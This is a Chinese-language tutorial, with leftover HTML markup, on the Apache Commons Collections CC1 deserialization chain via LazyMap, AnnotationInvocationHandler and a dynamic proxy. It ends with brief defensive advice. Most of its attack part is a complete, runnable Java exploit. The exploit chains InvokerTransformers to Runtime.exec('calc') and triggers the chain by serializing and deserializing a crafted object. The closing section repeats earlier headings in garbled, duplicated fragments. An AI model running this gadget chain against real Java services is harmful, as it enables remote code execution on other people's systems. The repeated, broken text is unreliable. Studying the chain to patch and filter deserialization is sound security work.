Java安全：CC链1分析（LazyMap类）教学文档<\/h1>

前言<\/h2>
本教学文档详细分析Apache Commons Collections（CC）反序列化漏洞链1（CC1）中利用LazyMap类的攻击路径。在学习本文前，建议先了解CC链1的核心机制和基本环境配置。<\/p>

CC链1核心回顾<\/h2>
CC链1的核心是利用ChainedTransformer<\/code>的transform<\/code>方法链式调用实现命令执行：<\/p>
Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>    new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span> new<\/span> Class[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>null<\/span>,<\/span> new<\/span> Object[<\/span>0<\/span>]}),<\/span>
<\/span><\/span>    new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>        new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>        new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>};<\/span>
<\/span><\/span>ChainedTransformer transformerChain =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>transformerChain.<\/span>transform<\/span>(<\/span>1<\/span>);<\/span> \/\/ 触发命令执行
<\/span><\/span><\/span><\/code><\/pre>攻击的关键在于找到能够触发transform<\/code>方法的调用点。<\/p>
LazyMap类分析<\/h2>
LazyMap.get()方法<\/h3>
LazyMap<\/code>类中的get<\/code>方法是触发transform<\/code>的关键点：<\/p>
public<\/span> Object get<\/span>(<\/span>Object key)<\/span> {<\/span>
<\/span><\/span>    if<\/span> (<\/span>map.<\/span>containsKey<\/span>(<\/span>key)<\/span> ==<\/span> false<\/span>)<\/span> {<\/span> \/\/ 当key不存在时
<\/span><\/span><\/span><\/span>        Object value =<\/span> factory.<\/span>transform<\/span>(<\/span>key);<\/span> \/\/ 关键调用点
<\/span><\/span><\/span><\/span>        map.<\/span>put<\/span>(<\/span>key,<\/span> value);<\/span>
<\/span><\/span>        return<\/span> value;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    return<\/span> map.<\/span>get<\/span>(<\/span>key);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>当满足map.containsKey(key) == false<\/code>时，会调用factory<\/code>对象的transform<\/code>方法。<\/p>
LazyMap构造方法<\/h3>
LazyMap<\/code>的构造方法是受保护的：<\/p>
protected<\/span> LazyMap<\/span>(<\/span>Map map,<\/span> Transformer factory)<\/span> {<\/span>
<\/span><\/span>    super<\/span>(<\/span>map);<\/span>
<\/span><\/span>    if<\/span> (<\/span>factory ==<\/span> null<\/span>)<\/span> {<\/span>
<\/span><\/span>        throw<\/span> new<\/span> IllegalArgumentException(<\/span>"Factory must not be null"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    this<\/span>.<\/span>factory<\/span> =<\/span> factory;<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>但可以通过静态方法decorate()<\/code>创建实例：<\/p>
public<\/span> static<\/span> Map decorate<\/span>(<\/span>Map map,<\/span> Transformer factory)<\/span> {<\/span>
<\/span><\/span>    return<\/span> new<\/span> LazyMap(<\/span>map,<\/span> factory);<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>测试Demo<\/h3>
验证LazyMap.get()<\/code>触发transform<\/code>的Demo：<\/p>
public<\/span> class<\/span> main2<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>        HashMap<<\/span>Object,<\/span>Object><\/span> hash =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        Map decorate =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>hash,<\/span> chainedTransformer);<\/span>
<\/span><\/span>        decorate.<\/span>get<\/span>(<\/span>"key"<\/span>);<\/span> \/\/ 触发transform
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>AnnotationInvocationHandler类分析<\/h2>
invoke方法<\/h3>
AnnotationInvocationHandler<\/code>类的invoke<\/code>方法是关键：<\/p>
public<\/span> Object invoke<\/span>(<\/span>Object proxy,<\/span> Method method,<\/span> Object[]<\/span> args)<\/span> {<\/span>
<\/span><\/span>    String member =<\/span> method.<\/span>getName<\/span>();<\/span>
<\/span><\/span>    Class<?>[]<\/span> paramTypes =<\/span> method.<\/span>getParameterTypes<\/span>();<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 绕过两个if判断
<\/span><\/span><\/span><\/span>    if<\/span> (<\/span>member.<\/span>equals<\/span>(<\/span>"equals"<\/span>)<\/span> &&<\/span> paramTypes.<\/span>length<\/span> ==<\/span> 1<\/span> &&<\/span> paramTypes[<\/span>0<\/span>]<\/span> ==<\/span> Object.<\/span>class<\/span>)<\/span>
<\/span><\/span>        return<\/span> equalsImpl(<\/span>args[<\/span>0<\/span>]);<\/span>
<\/span><\/span>    if<\/span> (<\/span>paramTypes.<\/span>length<\/span> !=<\/span> 0<\/span>)<\/span>
<\/span><\/span>        throw<\/span> new<\/span> AssertionError(<\/span>"Too many parameters for an annotation method"<\/span>);<\/span>
<\/span><\/span>    
<\/span><\/span>    switch<\/span>(<\/span>member)<\/span> {<\/span>
<\/span><\/span>        case<\/span> "toString"<\/span>:<\/span> return<\/span> toStringImpl();<\/span>
<\/span><\/span>        case<\/span> "hashCode"<\/span>:<\/span> return<\/span> hashCodeImpl();<\/span>
<\/span><\/span>        case<\/span> "annotationType"<\/span>:<\/span> return<\/span> type;<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    \/\/ 关键调用点
<\/span><\/span><\/span><\/span>    Object result =<\/span> memberValues.<\/span>get<\/span>(<\/span>member);<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>触发条件：<\/p>

方法名不为equals<\/code><\/li>
无参调用方法<\/li>
<\/ol>
动态代理机制<\/h3>
AnnotationInvocationHandler<\/code>实现了InvocationHandler<\/code>接口，可以作为动态代理的处理器：<\/p>
class<\/span> AnnotationInvocationHandler<\/span> implements<\/span> InvocationHandler,<\/span> Serializable {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>创建代理对象的代码：<\/p>
Map proxyInstance =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>    LazyMap.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>    new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> 
<\/span><\/span>    instance);<\/span>
<\/span><\/span><\/code><\/pre>readObject方法<\/h3>
AnnotationInvocationHandler<\/code>的readObject<\/code>方法中会遍历memberValues<\/code>：<\/p>
private<\/span> void<\/span> readObject<\/span>(<\/span>ObjectInputStream s)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>    for<\/span> (<\/span>Map.<\/span>Entry<\/span><<\/span>String,<\/span> Object><\/span> memberValue :<\/span> memberValues.<\/span>entrySet<\/span>())<\/span> {<\/span>
<\/span><\/span>        \/\/ 会调用memberValues的get方法
<\/span><\/span><\/span><\/span>        String name =<\/span> memberValue.<\/span>getKey<\/span>();<\/span>
<\/span><\/span>        \/\/ ...
<\/span><\/span><\/span><\/span>    }<\/span>
<\/span><\/span>    \/\/ ...
<\/span><\/span><\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>完整攻击链构造<\/h2>
攻击思路<\/h3>

创建ChainedTransformer<\/code>链<\/li>
使用LazyMap.decorate()<\/code>创建LazyMap<\/code>实例<\/li>
通过反射创建AnnotationInvocationHandler<\/code>实例作为代理处理器<\/li>
创建代理对象，其处理器为上一步创建的实例<\/li>
再次通过反射创建AnnotationInvocationHandler<\/code>实例，设置memberValues<\/code>为代理对象<\/li>
序列化\/反序列化触发漏洞<\/li>
<\/ol>
完整EXP<\/h3>
import<\/span> org.apache.commons.collections.Transformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ChainedTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.ConstantTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.functors.InvokerTransformer;<\/span>
<\/span><\/span>import<\/span> org.apache.commons.collections.map.LazyMap;<\/span>
<\/span><\/span>import<\/span> java.io.*;<\/span>
<\/span><\/span>import<\/span> java.lang.reflect.*;<\/span>
<\/span><\/span>import<\/span> java.nio.file.*;<\/span>
<\/span><\/span>import<\/span> java.util.*;<\/span>
<\/span><\/span>
<\/span><\/span>public<\/span> class<\/span> cc11<\/span> {<\/span>
<\/span><\/span>    public<\/span> static<\/span> void<\/span> main<\/span>(<\/span>String[]<\/span> args)<\/span> throws<\/span> Exception {<\/span>
<\/span><\/span>        \/\/ 1. 构造Transformer链
<\/span><\/span><\/span><\/span>        Transformer[]<\/span> transformers =<\/span> new<\/span> Transformer[]{<\/span>
<\/span><\/span>            new<\/span> ConstantTransformer(<\/span>Runtime.<\/span>class<\/span>),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"getMethod"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>,<\/span> Class[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"getRuntime"<\/span>,<\/span>null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"invoke"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>Object.<\/span>class<\/span>,<\/span> Object[].<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>null<\/span>,<\/span> null<\/span>}),<\/span>
<\/span><\/span>            new<\/span> InvokerTransformer(<\/span>"exec"<\/span>,<\/span> 
<\/span><\/span>                new<\/span> Class[]{<\/span>String.<\/span>class<\/span>},<\/span> 
<\/span><\/span>                new<\/span> Object[]{<\/span>"calc"<\/span>})<\/span>
<\/span><\/span>        };<\/span>
<\/span><\/span>        ChainedTransformer chainedTransformer =<\/span> new<\/span> ChainedTransformer(<\/span>transformers);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 2. 创建LazyMap
<\/span><\/span><\/span><\/span>        HashMap<<\/span>Object,<\/span>Object><\/span> hash =<\/span> new<\/span> HashMap<>();<\/span>
<\/span><\/span>        Map decorate =<\/span> LazyMap.<\/span>decorate<\/span>(<\/span>hash,<\/span> chainedTransformer);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 3. 反射获取AnnotationInvocationHandler构造方法
<\/span><\/span><\/span><\/span>        Class c =<\/span> Class.<\/span>forName<\/span>(<\/span>"sun.reflect.annotation.AnnotationInvocationHandler"<\/span>);<\/span>
<\/span><\/span>        Constructor constructor =<\/span> c.<\/span>getDeclaredConstructor<\/span>(<\/span>Class.<\/span>class<\/span>,<\/span> Map.<\/span>class<\/span>);<\/span>
<\/span><\/span>        constructor.<\/span>setAccessible<\/span>(<\/span>true<\/span>);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 4. 创建代理处理器
<\/span><\/span><\/span><\/span>        InvocationHandler instance =<\/span> (<\/span>InvocationHandler)<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> decorate);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 5. 创建代理对象
<\/span><\/span><\/span><\/span>        Map proxyInstance =<\/span> (<\/span>Map)<\/span> Proxy.<\/span>newProxyInstance<\/span>(<\/span>
<\/span><\/span>            LazyMap.<\/span>class<\/span>.<\/span>getClassLoader<\/span>(),<\/span> 
<\/span><\/span>            new<\/span> Class[]{<\/span>Map.<\/span>class<\/span>},<\/span> 
<\/span><\/span>            instance);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 6. 创建最终触发对象
<\/span><\/span><\/span><\/span>        Object o =<\/span> constructor.<\/span>newInstance<\/span>(<\/span>Override.<\/span>class<\/span>,<\/span> proxyInstance);<\/span>
<\/span><\/span>        
<\/span><\/span>        \/\/ 序列化和反序列化触发
<\/span><\/span><\/span><\/span>        serialize(<\/span>o);<\/span>
<\/span><\/span>        unserialize(<\/span>"1.bin"<\/span>);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> serialize<\/span>(<\/span>Object obj)<\/span> throws<\/span> IOException {<\/span>
<\/span><\/span>        ObjectOutputStream out =<\/span> new<\/span> ObjectOutputStream(<\/span>Files.<\/span>newOutputStream<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>"1.bin"<\/span>)));<\/span>
<\/span><\/span>        out.<\/span>writeObject<\/span>(<\/span>obj);<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>    
<\/span><\/span>    public<\/span> static<\/span> void<\/span> unserialize<\/span>(<\/span>String filename)<\/span> throws<\/span> IOException,<\/span> ClassNotFoundException {<\/span>
<\/span><\/span>        ObjectInputStream out =<\/span> new<\/span> ObjectInputStream(<\/span>Files.<\/span>newInputStream<\/span>(<\/span>Paths.<\/span>get<\/span>(<\/span>filename)));<\/span>
<\/span><\/span>        out.<\/span>readObject<\/span>();<\/span>
<\/span><\/span>    }<\/span>
<\/span><\/span>}<\/span>
<\/span><\/span><\/code><\/pre>攻击链执行流程<\/h2>

反序列化AnnotationInvocationHandler<\/code>对象<\/li>
调用readObject<\/code>方法<\/li>
遍历memberValues<\/code>（代理对象）<\/li>
触发代理对象的get<\/code>方法<\/li>
调用AnnotationInvocationHandler.invoke<\/code>方法<\/li>
调用LazyMap.get<\/code>方法<\/li>
调用ChainedTransformer.transform<\/code>方法<\/li>
执行命令链<\/li>
<\/ol>
关键点总结<\/h2>

LazyMap.get()<\/strong>：触发transform<\/code>的关键调用点<\/li>
动态代理<\/strong>：通过代理机制自动调用invoke<\/code>方法<\/li>
AnnotationInvocationHandler<\/strong>：

invoke<\/code>方法触发get<\/code><\/li>
readObject<\/code>方法作为反序列化入口<\/li>
<\/ul>
<\/li>
反射<\/strong>：绕过私有构造方法的限制<\/li>
序列化\/反序列化<\/strong>：最终触发点<\/li>
<\/ol>
防御建议<\/h2>

升级Apache Commons Collections到安全版本<\/li>
使用SerialKiller<\/code>等工具过滤危险的序列化对象<\/li>
在反序列化时进行严格的白名单控制<\/li>
<\/ol>
Java安全：CC链1分析（LazyMap类）教学文档<\/h1>

前言<\/h2> 本教学文档详细分析Apache Commons Collections（CC）反序列化漏洞链1（CC1）中利用LazyMap类的攻击路径。在学习本文前，建议先了解CC链1的核心机制和基本环境配置。<\/p>

AnnotationInvocationHandler类分析<\/h2>

完整攻击链构造<\/h2>

防御建议<\/h2> 升级Apache Commons Collections到安全版本<\/li> 使用SerialKiller<\/code>等工具过滤危险的序列化对象<\/li> 在反序列化时进行严格的白名单控制<\/li> <\/ol>

前言<\/h2>
本教学文档详细分析Apache Commons Collections（CC）反序列化漏洞链1（CC1）中利用LazyMap类的攻击路径。在学习本文前，建议先了解CC链1的核心机制和基本环境配置。<\/p>

防御建议<\/h2>

升级Apache Commons Collections到安全版本<\/li>
使用`SerialKiller<\/code>等工具过滤危险的序列化对象<\/li>`
`在反序列化时进行严格的白名单控制<\/li> <\/ol>`
